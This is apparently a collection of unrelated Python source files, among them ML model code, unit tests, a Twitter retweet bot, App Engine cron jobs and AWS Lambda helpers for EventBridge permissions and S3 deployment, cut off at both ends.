sorted_lines.extend(lines)
if extra:
sorted_lines.append('\n')
sorted_lines.extend(extra)
with open(file_out, mode="w", encoding="utf8") as fd:
fd.writelines(sorted_lines)
def get_concepts_sorted(file_in):
identifiers = []
g = create_bound_graph()
g.parse(location=file_in, format="turtle")
navigator = SKOSNavigate(g)
def do_node(node, visited_nodes):
identifiers.append(get_fragment(str(node)))
children = tuple(sorted(navigator.find_children(node)))
if node not in visited_nodes and len(children):
for child in children:
do_node(child, visited_nodes | {node})
elif node in visited_nodes:
print('Cycle detected for nodes', visited_nodes, 'at node', node)
do_node(navigator.find_root(), set())
return identifiers
|
python
|
import pytest
from ee.clickhouse.queries.groups_join_query import GroupsJoinQuery
from posthog.models.filters import Filter
def test_groups_join_query_blank():
filter = Filter(data={"properties": []})
assert GroupsJoinQuery(filter, 2).get_join_query() == ("", {})
def test_groups_join_query_filtering(snapshot):
filter = Filter(
data={"properties": [{"key": "industry", "value": "finance", "type": "group", "group_type_index": 0}]}
)
assert GroupsJoinQuery(filter, 2).get_join_query() == snapshot
def test_groups_join_query_filtering_with_custom_key_names(snapshot):
filter = Filter(
data={
"properties": [
{"key": "industry", "value": "finance", "type": "group", "group_type_index": 0},
{"key": "company", "value": "crashed", "type": "group", "group_type_index": 2},
]
}
)
assert GroupsJoinQuery(filter, 2, join_key="call_me_industry").get_join_query() == snapshot
|
python
|
import sys
from tkinter import *
from slideShow import SlideShow
if len(sys.argv) == 2:
picdir = sys.argv[1]
else:
picdir = '../gifs'
root = Tk()
Label(root, text="Two embedded slide shows: each side uses after() loop").pack()
SlideShow(msecs=200,
parent=root, picdir=picdir, bd=3, relief=SUNKEN).pack(side=LEFT)
SlideShow(msecs=200,
parent=root, picdir=picdir, bd=3, relief=SUNKEN).pack(side=RIGHT)
root.mainloop()
|
python
|
class Transform(object):
"""Transform coordinate systems: scale / translate"""
def __init__(self, scale, translate):
"""Set up the parameters for the transform"""
self.scale = scale
self.translate = translate
def forward(self, pt):
"""From the original box to (-1,-1),(1,1) box """
return (pt[0] - self.translate[0]) / self.scale[0], \
(pt[1] - self.translate[1]) / self.scale[1]
def backward(self, pt):
"""From the (-1,-1),(1,1) box back to the original box"""
return (pt[0] * self.scale[0]) + self.translate[0], \
(pt[1] * self.scale[1]) + self.translate[1]
def get_transform(box):
"""Get a transform object for a bounding box to transform to (-1,-1),(1,1)
"""
# target = ((-1.,-1.),(1.,1.))
# tcx, tcy = (0., 0.)
tdx, tdy = (2., 2.)
(sxmin, symin), (sxmax, symax) = box
scx, scy = (sxmin + sxmax) * 0.5, (symin + symax) * 0.5
sdx, sdy = (sxmax - sxmin), (symax - symin)
scale = max(sdx / tdx, sdy / tdy)
# print("scale {}".format(scale))
return Transform((scale, scale), (scx, scy))
def get_box(pts):
"""Returns tight fitting bounding box (axis aligned) around set of points
"""
assert len(pts)
it = iter(pts)
ll = list(next(it))
ur = list(ll[:])
for pt in it:
if pt[0] < ll[0]:
ll[0] = pt[0]
if pt[1] < ll[1]:
ll[1] = pt[1]
if pt[0] > ur[0]:
ur[0] = pt[0]
if pt[1] > ur[1]:
ur[1] = pt[1]
return tuple(ll), tuple(ur)
def _test_transform():
box = ((70000., 100000.), (75000., 125000.))
t = get_transform(box)
assert t.forward(box[0]) == (-0.2, -1)
assert t.forward((72500., 112500.)) == (0, 0)
assert t.forward(box[1]) == (0.2, 1)
assert t.backward((-0.2, -1)) == box[0]
assert t.backward((0.2, 1)) == box[1]
assert t.backward((0, 0)) == (72500, 112500)
def _test_box():
pts = [(78000., 100000.), (75000., 125000.)]
assert get_box(pts) == ((75000.0, 100000.0), (78000.0, 125000.0))
if __name__ == "__main__":
_test_transform()
_test_box()
|
python
|
import torch
import torch.nn as nn
from facenet_pytorch import InceptionResnetV1
class SiameseNet(nn.Module):
def __init__(self):
super().__init__()
self.encoder = InceptionResnetV1(pretrained='vggface2')
emb_len = 512
self.last = nn.Sequential(
nn.Linear(4*emb_len, 200, bias=False),
nn.BatchNorm1d(200, eps=0.001, momentum=0.1, affine=True),
nn.ReLU(),
nn.Linear(200, 1)
)
def forward(self, input1, input2):
emb1 = self.encoder(input1)
emb2 = self.encoder(input2)
x1 = torch.pow(emb1, 2) - torch.pow(emb2, 2)
x2 = torch.pow(emb1 - emb2, 2)
x3 = emb1 * emb2
x4 = emb1 + emb2
x = torch.cat((x1,x2,x3,x4), dim=1)
x = self.last(x)
return x
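# Minimal shape sketch (assumed usage, not part of the original file); the
# pretrained encoder is typically fed 160x160 RGB face crops and the head
# emits one similarity logit per pair:
#   net = SiameseNet().eval()
#   a, b = torch.randn(2, 3, 160, 160), torch.randn(2, 3, 160, 160)
#   with torch.no_grad():
#       print(net(a, b).shape)  # torch.Size([2, 1])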
|
python
|
Import("env")
from SCons.Script import COMMAND_LINE_TARGETS
def buildWeb(source, target, env):
env.Execute("cd web; pnpm build")
print("Successfully built webui")
def convertImages(source, target, env):
env.Execute("cd converter; go run .")
print("Successfully converted images")
env.AddPreAction("buildprog", convertImages)
env.AddPreAction("uploadfs", buildWeb)
|
python
|
from . import tables
from . unquote import unquote as _unquote
__all__ = 'Quote', 'unquote'
SHORT_ASCII = '\\u{0:04x}'
LONG_ASCII = '\\u{0:04x}\\u{1:04x}'
def Quote(b):
return _QUOTES[bool(b)]
def unquote(s, strict=True):
return _QUOTES[s[0] == tables.SINGLE].remove(s, strict)
class _Quote:
def __init__(self, table):
for k, v in table.items():
setattr(self, k, v)
def add(self, s, ensure_ascii=False):
if ensure_ascii:
re, replace = self.escape_ascii_re, self._replace_ascii
else:
re, replace = self.escape_re, self._replace_unicode
return self.quote + re.sub(replace, s) + self.quote
def remove(self, s, strict=False):
return _unquote(self, s, strict)
def _replace_unicode(self, match):
return self.escape_dict[match.group(0)]
def _replace_ascii(self, match):
s = match.group(0)
try:
return self.escape_dict[s]
except KeyError:
pass
n = ord(s) if isinstance(s, str) else s
if n < 0x10000:
return SHORT_ASCII.format(n)
# surrogate pair
n -= 0x10000
s1 = 0xD800 | ((n >> 10) & 0x3FF)
s2 = 0xDC00 | (n & 0x3FF)
return LONG_ASCII.format(s1, s2)
_QUOTES = tuple(_Quote(t) for t in tables.QUOTES)
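# Worked example of the surrogate-pair branch in _replace_ascii (illustration
# only, not part of the original module): for U+1F600 the code point is
# 0x1F600; subtracting 0x10000 leaves 0xF600, whose high ten bits give 0xD83D
# and low ten bits give 0xDE00, so the emitted escape is '\ud83d\ude00'.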
|
python
|
""" predict.py
Predict flower name from an image with predict.py along with the probability of
that name. That is, you'll pass in a single image /path/to/image and return the
flower name and class probability.
Basic usage:
python predict.py /path/to/image checkpoint
Args:
--img
--checkpoint
--top_k
--category_names
--gpu
Returns:
Most likely flower names and class probabilities
Examples:
Return top K most likely classes:
python predict.py input checkpoint --top_k 3
Use a mapping of categories to real names:
python predict.py input checkpoint --category_names cat_to_name.json
Use GPU for inference:
python predict.py input checkpoint --gpu
"""
__author__ = "Ken Norton <[email protected]>"
import json
import argparse
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from torchvision import transforms, models
def main():
parser = argparse.ArgumentParser(
description='Predict flower name from an image with along with the \
probability of that name. ')
parser.add_argument('--img',
type=str,
dest='image_path',
default='flowers/train/1/image_06770.jpg',
action='store',
help='File path to an image input')
parser.add_argument('--checkpoint',
default='model_checkpoint.pth',
type=str,
dest='checkpoint',
action='store',
help='Model checkpoint')
parser.add_argument('--top_k',
dest='top_k',
type=int,
default=5,
action='store',
help='Number of top classes to return')
parser.add_argument('--category_names',
type=str,
dest='category_names',
default='cat_to_name.json',
action='store',
help='JSON file containing category-name mapping')
parser.add_argument('--gpu',
type=bool,
dest='gpu',
default=True,
action='store',
help='Number of epochs')
pa = parser.parse_args()
path_to_img = pa.image_path
checkpoint = pa.checkpoint
top_k = pa.top_k
category_names = pa.category_names
gpu = pa.gpu
if (torch.cuda.is_available() and gpu):
gpu = True
device = torch.device('cuda:0')
else:
gpu = False
device = torch.device('cpu')
with open(category_names, 'r') as f:
cat_to_name = json.load(f)
def load_checkpoint(filepath):
cp = torch.load(filepath)
if cp['architecture'] == 'vgg16':
model = models.vgg16(pretrained=True)
model.name = 'vgg16'
elif cp['architecture'] == 'alexnet':
model = models.alexnet(pretrained=True)
model.name = 'alexnet'
# Freeze parameters so we don't backprop through them
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = cp['class_to_idx']
model.classifier = cp['classifier']
model.load_state_dict(cp['state_dict'])
return model
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns a NumPy array
'''
img_handler = Image.open(image)
process_img = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
return process_img(img_handler)
def predict(image_path, model):
model.to(device)
img_torch = process_image(image_path)
img_torch = img_torch.unsqueeze_(0)
img_torch = img_torch.float()
with torch.no_grad():
            output = model.forward(img_torch.to(device))
probability = F.softmax(output.data, dim=1)
pb, cl = probability.topk(top_k)
if gpu:
return pb.cpu().numpy(), cl.cpu().numpy()
else:
return pb.numpy(), cl.numpy()
def print_predict(image_path, model):
probs, classes = predict(image_path, model)
probabilities = probs[0]
class_names = {val: key for key, val in model.class_to_idx.items()}
c_names = [cat_to_name[class_names[x]] for x in classes[0]]
index = np.arange(len(c_names))
print('Predictions for ', image_path, ':')
for i in index:
prob = "{0:.2f}".format(probabilities[i] * 100)
print(prob, '% -- ', c_names[i])
model = load_checkpoint(checkpoint)
print_predict(path_to_img, model)
if __name__ == "__main__":
main()
|
python
|
import accounting.config
import pytransact.testsupport
def pytest_configure(config):
global unconfigure
unconfigure = pytransact.testsupport.use_unique_database()
accounting.config.config.set('accounting', 'mongodb_dbname',
pytransact.testsupport.dbname)
def pytest_unconfigure(config):
unconfigure()
|
python
|
#!/usr/bin/python3
import math
#Generate the ovsf tree
def ovsfGenerator(numberOfMobile):
#calculate the depth of the OVSF code tree
numberOfColumn = math.ceil(math.log(numberOfMobile,2))
column = [1]
#Generation of the list of codes
for i in range (0,numberOfColumn):
newColumn=[]
xornumber=pow(2,pow(2,i))-1 #create a mask in order to do a bit inversion of the code
for j in column :
codesize = j.bit_length()
code=(j<<codesize) + j #generate the first code by duplicating the previous code
newColumn.append(code)
code=(j<<codesize) + (j^xornumber) #generate the second code by duplicating the previous code and inverting all bits of it
newColumn.append(code)
column=newColumn
return column
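# Minimal usage sketch (assumed example, not part of the original file):
# for four mobiles the tree has depth 2 and the generator returns
# [15, 12, 10, 9], i.e. the binary codes 1111, 1100, 1010 and 1001
# (with 0 standing in for -1 in the usual OVSF notation).
if __name__ == "__main__":
    print(ovsfGenerator(4))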
|
python
|
from pprint import pprint as pp
from funcs import *
import time
import random
import ConfigParser
config= ConfigParser.ConfigParser()
config.read('config.cfg')
PERIOD = int(config.get('Run','period'))
## currently set to make it so we don't hit window
## rate limits on friendship/show
## should be able to increase to 200 when using
## friendship/lookup
LIMIT = config.get('Run','limit')
def wait(period):
window_in_seconds = period * 60
seconds = random.randint(0,window_in_seconds)
pp("Waiting %d minutes" % (float(seconds) / 60) )
time.sleep(seconds)
def tweetserve():
# get the latest mentioners
mentioners = get_mentioners(LIMIT)
pp("# mentioners: %d" % len(mentioners))
# filter out those whose tweets are protected
mentioners = [m for m in mentioners if not m['protected']]
pp("# unprotected mentioners: %d" % len(mentioners))
ids = list(set([m['id'] for m in mentioners]))
pp("# unique ids: %d" % len(ids))
friendships = lookup_friendships(ids)
#filter out people that don't follow
friendships = [f for f
in friendships
if 'followed_by' in f['connections']]
pp("# following mentioners: %d" % len(friendships))
selected = random.sample(friendships,1)[0]
pp("Selected friend: %s / @%s" % (selected['name'],selected['screen_name']))
pp("Connections: %s" % (",".join(selected['connections'])))
sn = selected['screen_name']
#selects last 20 tweets by default but could have this be a setting
tweets = t.statuses.user_timeline(screen_name=sn)
if 'following' not in selected['connections']:
new_friend = t.friendships.create(screen_name=sn)
pp("Created new friendship")
rt = None
while rt is None and len(tweets) > 0:
lt = tweets.pop(0)
try:
rt = t.statuses.retweet(id=lt['id'])
pp("RT: @%s: %s" % (lt['user']['screen_name'],lt['text']))
except:
pp("Unable to RT tweet: @%s: %s" % (lt['user']['screen_name'],lt['text']))
pass
wait(PERIOD)
tweetserve()
|
python
|
#!/usr/bin/env python3.6
#
# uloop_check.py
#
# Gianna Paulin <[email protected]>
# Francesco Conti <[email protected]>
#
# Copyright (C) 2019-2021 ETH Zurich, University of Bologna
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# See LICENSE.sw.txt for details.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from uloop_common import *
import math
# high-level loop
def iterate_hl_loop(TP, oh, ow, nof, nif, fs, qa, qw):
ih = (oh - 1) + fs
iw = (ow - 1) + fs
FB = 5 # filter buffer size (FB*FB)
BS = 4 # block size
output_buffer_size = 3
n_tiles_K_in = int(math.ceil(nif/TP))
n_tiles_K_out = int(math.ceil(nof/TP))
n_tiles_Hout = int(math.ceil(ih/FB))
n_tiles_Wout = int(math.ceil(iw/FB))
n_tiles_qa = int(math.ceil(qa/BS))
n_xpatches = n_tiles_Hout * n_tiles_Wout #* n_tiles_qa
xpatch_size = FB*FB*BS*TP
ypatch_size = output_buffer_size*output_buffer_size*TP
# reset idices
y_idx = 0
W_idx = 0
NQ_idx = 0
x_idx = 0
curr_idx = (0, 0, 0, 0, 0)
if fs==3:
n_w_stream_per_x_patch = qw
w_stream_size = fs*fs*TP
total_w_stream = n_w_stream_per_x_patch*w_stream_size
else:
n_w_stream_per_x_patch = fs
w_stream_size = qw*TP
total_w_stream = n_w_stream_per_x_patch*w_stream_size
for i_major in range(n_tiles_Hout):
for j_major in range(n_tiles_Wout):
for k_out_major in range(n_tiles_K_out):
for k_in_major in range(n_tiles_K_in):
for qa_major in range(n_tiles_qa):
# print(i_major, j_major, k_out_major, k_in_major, qa_major)
# print(n_tiles_Hout, n_tiles_Wout, n_tiles_K_out, n_tiles_K_in, n_tiles_qa)
W_idx = k_out_major*(n_tiles_K_in*(2+total_w_stream))-k_out_major*2 + k_in_major*(total_w_stream+2)
y_idx = i_major*n_tiles_Wout*n_tiles_K_out*ypatch_size + j_major*n_tiles_K_out*ypatch_size + k_out_major*ypatch_size
x_idx = i_major*n_tiles_Wout*(n_tiles_K_in*n_tiles_qa*xpatch_size) + j_major*(n_tiles_K_in*n_tiles_qa*xpatch_size) + k_in_major*(n_tiles_qa*xpatch_size) + qa_major*xpatch_size
NQ_idx = k_out_major * 32 *(32+16)
curr_idx = i_major, j_major, k_out_major, k_in_major, qa_major
yield W_idx, x_idx, NQ_idx, y_idx, curr_idx
VERBOSE = True
def uloop_check(TP, oh, ow, nof, nif, fs, qa, qw, verbose=VERBOSE):
print("> Config TP=%d, oh=%d, ow=%d, nof=%d, nif=%d, fs=%d, qa=%d, qw=%d" % (TP, oh, ow, nof, nif, fs, qa, qw))
ih = (oh - 1) + fs
iw = (ow - 1) + fs
FB = 5 # filter buffer size (FB*FB)
BS = 4 # block size
n_tiles_K_in = int(math.ceil(nif/TP))
n_tiles_K_out = int(math.ceil(nof/TP))
n_tiles_Hout = int(math.ceil(ih/FB))
n_tiles_Wout = int(math.ceil(iw/FB))
n_tiles_qa = int(math.ceil(qa/BS))
n_xpatches = n_tiles_Hout * n_tiles_Wout
print("n_xpatches: ", n_xpatches)
loops_range = [
n_tiles_qa,
n_tiles_K_in,
n_tiles_K_out,
n_xpatches
]
if fs==3:
stream_size_fs = TP*fs*qw
else: # fs==1:
stream_size_fs = TP*fs*fs*qw
registers = [
0,
0,
0,
0,
0,
0,
nif,
nof,
TP*FB*FB*4,
TP*9,
stream_size_fs, #TP*fs*qw, # or TP*fs*fs*qw
TP*fs*fs*qw+2,
32*(32+16),
0
]
loops_ops,code,mnem = uloop_load("code.yml")
loops = uloop_get_loops(loops_ops, loops_range)
err = 0
idx = []
for j in range(NB_LOOPS):
idx.append(0)
state = (0,0,0,idx)
busy = False
execute = True
# uloop_print_idx(state, registers)
hidx = 0, 0, 0, 0, 0
hl_loop = iterate_hl_loop(TP, oh, ow, nof, nif, fs, qa, qw)
hW, hx, hNQ, hy, hidx = hl_loop.__next__()
for i in range(0,1000000):
new_registers = uloop_execute(state, code, registers)
execute,end,busy,state = uloop_state_machine(loops, state, verbose=verbose)
if execute:
registers = new_registers
if not busy:
try:
                hW, hx, hNQ, hy, hidx = hl_loop.__next__()
except StopIteration:
pass
if verbose:
uloop_print_idx(state, registers)
uW, ux, uNQ, uy = registers[0:4]
if (hW != uW or hx != ux or hNQ != uNQ or hy != uy):
if verbose:
print(" ERROR!!!")
print(" High-level: W=%d x=%d NQ=%d y=%d" % (hW, hx, hNQ, hy))
print(" uLoop: W=%d x=%d NQ=%d y=%d" % (uW, ux, uNQ, uy))
err += 1
if end:
break
print(err, " errors", "!!!" if err > 0 else "")
return err
for oh in range(3,12,3):
for ow in range(3,12,3):
for fs in (1,0):
for nif in range(32, 64+32, 32):
for qa in range(1,9):
for qw in range(1,9):
for nof in range(32, 64+32, 32):
err = uloop_check(
TP = 32,
fs = fs,
nof = nof,
nif = nif,
oh = oh,
ow = ow,
qa = qa,
qw = qw,
verbose = False
)
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
uloop_check(
TP = 32,
fs = fs,
nof = nof,
nif = nif,
oh = oh,
ow = ow,
qa = qa,
qw = qw,
verbose = True
)
|
python
|
"""Cron job code."""
from google.appengine.ext import ndb
import cloudstorage
import datetime
import logging
from api import PermissionDenied
from model import (Email, ErrorChecker, Indexer, User)
import config
import util
class Cron:
"""A collection of functions and a permission scheme for running cron jobs.
Very similar to api.Api."""
def __init__(self, api):
"""Requires an admin api object."""
if not api.user.is_admin:
raise PermissionDenied("Crons must be run as admin.")
self.api = api
def check_for_errors(self):
"""Check for new errors - email on error.
Must be called with internal_api for full permissions.
See named_model@Index for full description.
"""
checker = ErrorChecker.get_or_insert('the error checker')
result = checker.check()
checker.put()
return result
def send_pending_email(self):
"""Send any email in the queue.
Must be called with internal_api for full permissions.
See id_model@Email for full description.
"""
return Email.send_pending_email()
def assign_usernames(self):
"""Assigns usernames to all existing users without a
current username
"""
query = User.query()
changed_users = []
for user in query:
user_dict = user.to_dict()
if user_dict.get('username') is None:
user.username = User.create_username(**user_dict)
changed_users.append(user)
# Removes bad first_names
elif 'first_name' in user_dict:
if '@' in user_dict['first_name']:
user.first_name = user_dict['first_name'].split('@')[0]
user.username = None
changed_users.append(user)
# Temporary limiting for acceptance
if len(changed_users) > 40:
break
ndb.put_multi(changed_users)
return changed_users
def index_all(self):
"""Cron job to index all content. Should only be run as
a job because it will likely time out otherwise. Comes in handy
for production where updates are constantly being made.
"""
indexer = Indexer.get_or_insert('the-indexer')
index = indexer.get_index()
entities = indexer.get_all_content_entities()
indexed_count = 0
for entity in entities:
# Added redundancy (we really don't want these!!)
if getattr(entity, 'listed') is True:
index.put(entity.to_search_document())
indexed_count += 1
# Update last_check on indexer to now
now = datetime.datetime.now()
indexer.last_check = now
indexer.put()
return indexed_count
def index(self):
"""Index content entities for text search.
Must be called with internal_api for full permissions.
See named_model@Index for full description.
"""
indexer = Indexer.get_or_insert('the-indexer')
index = indexer.get_index()
# Now and the max modified time of indexed entites
# will be used to update last_check. Basically the
# last check should either be now time if no items
# were found to update or the age of the last item
# that was updated.
#
# The reason that we cannot always use now time is
# because we may not index all of the enties between
# the last check and now if there are many of them.
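#
# Worked example (hypothetical timestamps): last_check = 10:00, now = 10:05.
# If no changed entities get indexed below, last_check becomes 10:05 (now).
# If entities modified at 10:01 and 10:03 get indexed, last_check becomes
# 10:03, so a later run still picks up anything modified after 10:03 that
# this run did not reach.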
now = datetime.datetime.now()
max_modified_time_of_indexed_entity = None
# get changes
changed_entities = indexer.get_changed_content_entities()
# post changes
for entity in changed_entities:
# Added redundancy (we really don't want these!!)
if getattr(entity, 'listed') is True:
index.put(entity.to_search_document())
# Update the most recent modification time for an
# indexed entity
if max_modified_time_of_indexed_entity is None:
max_modified_time_of_indexed_entity = entity.modified
else:
max_modified_time_of_indexed_entity = max(
max_modified_time_of_indexed_entity,
entity.modified
)
# Update last_check so that future calls to index no longer
# try to index these same items. The logic of what to set
# last_check to is articulated above.
any_updates = max_modified_time_of_indexed_entity is not None
indexer.last_check = (
now if not any_updates
else max_modified_time_of_indexed_entity
)
indexer.put()
return changed_entities
def clean_gcs_bucket(self, bucket):
"""Deletes all files in a given GCS bucket.
Used for emptying out cluttered buckets, like our backup buckets."""
filenames = [f.filename for f in cloudstorage.listbucket('/' + bucket)]
files_deleted = []
for filename in filenames:
try:
cloudstorage.delete(filename)
files_deleted.append(filename)
except cloudstorage.NotFoundError:
# We don't care, as long as the bucket winds up empty.
logging.warning("NotFoundError on file {}".format(filename))
logging.info("Files deleted: {}".format(files_deleted))
return files_deleted
|
python
|
######################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
# !/bin/python
from lib.state_machine import StateMachine
from lib.ssm import SSM
from lib.cloud_watch_events import CloudWatchEvents
from lib.metrics import Metrics
from lib.string_manipulation import convert_string_to_list
from os import environ
import time
import inspect
from lib.helper import sanitize, get_region
from lib.s3 import S3
import os
import json
from uuid import uuid4
class StepFunctions(object):
# Execute State Machines
def __init__(self, event, logger):
self.logger = logger
self.event = event
self.logger.info("State Machine Event")
self.logger.info(event)
def trigger_state_machine(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
sm = StateMachine(self.logger)
account_id = self.event.get('account')
resource_type = 'stno-console' if self.event.get('detail', {}).get('resource-type') is None \
else account_id + '-' + self.event.get('detail', {}).get('resource-type') + '-tagged'
state_machine_arn = environ.get('STATE_MACHINE_ARN')
# Execute State Machine
exec_name = "%s-%s-%s" % ('event-from', resource_type, time.strftime("%Y-%m-%dT%H-%M-%S-%s"))
self.event.update({'StateMachineArn': state_machine_arn})
self.logger.info("Triggering {} State Machine".format(state_machine_arn.split(":", 6)[6]))
response = sm.trigger_state_machine(state_machine_arn, self.event, sanitize(exec_name))
self.logger.info("State machine triggered successfully, Execution Arn: {}".format(response))
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
class CWEventPermissions(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.event_bus_name = self.params.get('EventBusName')
self.logger = logger
self.logger.info("CloudWatch Event Permissions Handler Event")
self.logger.info(event)
def _print_policy(self, cwe):
self.logger.info("Describe Event Bus")
response = cwe.describe_event_bus(self.event_bus_name)
policy = 'Policy Not Found' if response.get('Policy') is None else json.loads(response.get('Policy'))
self.logger.info("Printing Policy")
self.logger.info(policy)
def _is_valid_account_length(self, principal):
account_id_length = 12
if len(principal) == account_id_length:
self.logger.info('The AWS Account ID is a 12-digit number. Continuing...')
else:
raise Exception('The AWS Account ID should be a 12-digit number.')
def _create(self, principal_list):
cwe = CloudWatchEvents(self.logger)
# identify if principal is list of account IDs or organization arn
response = None
self.logger.info("Adding following principals to the policy: {}".format(principal_list))
for principal in principal_list:
if 'arn:aws:organizations' in principal:
self.logger.info('Adding Organization ID to the policy: {}'.format(principal))
split_value = principal.split('/')[-1]
condition = {
'Type': 'StringEquals',
'Key': 'aws:PrincipalOrgID',
'Value': split_value
}
# Once we specify a condition with an AWS organization ID, the recommendation is to use "*" as the value
# for Principal to grant permission to all the accounts in the named organization.
response = cwe.put_permission('*', split_value, self.event_bus_name, condition)
else:
self._is_valid_account_length(principal)
self.logger.info('Adding spoke account ID to the policy: {}'.format(principal))
response = cwe.put_permission(principal, principal, self.event_bus_name)
self._print_policy(cwe)
return response
def create_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# put permissions
# analyze if the principals is a list of accounts or Org Arn
self._create(self.params.get('Principals'))
return None
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
def update_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# update permissions
response = None
principal_list = self.params.get('Principals')
old_params = self.event.get('OldResourceProperties')
old_principal_list = old_params.get('Principals')
# Generate add and remove lists for update process
delete_list = list(set(old_principal_list) - set(principal_list))
self.logger.info('Remove permission for following principal(s): {}'.format(delete_list))
# if list is not empty
if delete_list:
response = self._delete(delete_list)
add_list = list(set(principal_list) - set(old_principal_list))
self.logger.info('Put permission for following principal(s): {}'.format(add_list))
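# For example (hypothetical principals): old = ['111111111111', '222222222222']
# and new = ['222222222222', '333333333333'] gives delete_list = ['111111111111']
# and add_list = ['333333333333']; '222222222222' is left untouched.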
# if list is not empty
if add_list:
response = self._create(add_list)
return response
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
def _delete(self, principal_list):
cwe = CloudWatchEvents(self.logger)
self.logger.info("Removing following principals from the policy: {}".format(principal_list))
# identify if principal is list of account IDs or organization arn
response = None
for principal in principal_list:
if 'arn:aws:organizations' in principal:
self.logger.info('Deleting Organization ID from the policy: {}'.format(principal))
split_value = principal.split('/')[-1]
response = cwe.remove_permission(split_value, self.event_bus_name)
else:
self.logger.info('Deleting spoke account ID from the policy: {}'.format(principal))
response = cwe.remove_permission(principal, self.event_bus_name)
self._print_policy(cwe)
return response
def delete_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# delete permissions
# analyze if the principals is a list of accounts or Org Arn
response = self._delete(self.params.get('Principals'))
return response
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
# Deploy all the files needed for console to customer's S3 bucket and
# update the configuration file with customer configurations
class S3ConsoleDeploy(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info("Upload console content to s3")
self.logger.info(event)
# Upload console content listed in the manifest file to customer's s3 bucket
def upload_console_files(self):
try:
s3 = S3(self.logger)
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
file_path = os.path.join(os.path.dirname(__file__), "console-manifest.json")
if os.path.exists(file_path):
with open(file_path, 'r') as json_data:
data = json.load(json_data)
destination_bucket = self.params.get('ConsoleBucket')
source_bucket = self.params.get('SrcBucket')
key_prefix = self.params.get('SrcPath') + '/'
for file in data["files"]:
key = 'console/' + file
s3.copy_object(source_bucket, key_prefix, key, destination_bucket)
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
# Upload the configuration file having customer configurations to customer's s3 bucket
def upload_config_file(self):
try:
s3 = S3(self.logger)
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
stno_config = {
"aws_project_region": self.params.get("AwsProjectRegion"),
"aws_cognito_region": self.params.get("AwsCognitoRegion"),
"aws_user_pools_id": self.params.get("AwsUserPoolsId"),
"aws_user_pools_web_client_id": self.params.get("AwsUserPoolsWebClientId"),
"aws_cognito_identity_pool_id": self.params.get("AwsCognitoIdentityPoolId"),
"oauth": {},
"aws_appsync_graphqlEndpoint": self.params.get("AwsAppsyncGraphqlEndpoint"),
"aws_appsync_region": self.params.get("AwsAppsyncRegion"),
"aws_appsync_authenticationType": "AMAZON_COGNITO_USER_POOLS",
"aws_content_delivery_bucket": self.params.get("AwsContentDeliveryBucket"),
"aws_content_delivery_bucket_region": self.params.get("AwsContentDeliveryBucketRegion"),
"aws_content_delivery_url": self.params.get("AwsContentDeliveryUrl")
}
configurations = 'const stno_config = ' + json.dumps(stno_config) + ';'
console_bucket = self.params.get('ConsoleBucket')
key = 'console/assets/stno_config.js'
s3.put_object(console_bucket, key, configurations)
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
class PrefixListIdToArnConverter(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info(event)
def get_prefix_list_arns(self) -> dict:
"""
Converts the list of prefix list ids to list of prefix list ARNs
:return: list of arns for the customer provided prefix lists
"""
prefix_list = self.params.get('PrefixListIds')
account_id = self.params.get('AccountId')
list_of_prefix_list_ids = convert_string_to_list(prefix_list)
self.logger.info(f"Processing prefix list ids:"
f" {list_of_prefix_list_ids}")
list_of_prefix_list_arns = []
if len(list_of_prefix_list_ids) == 0:
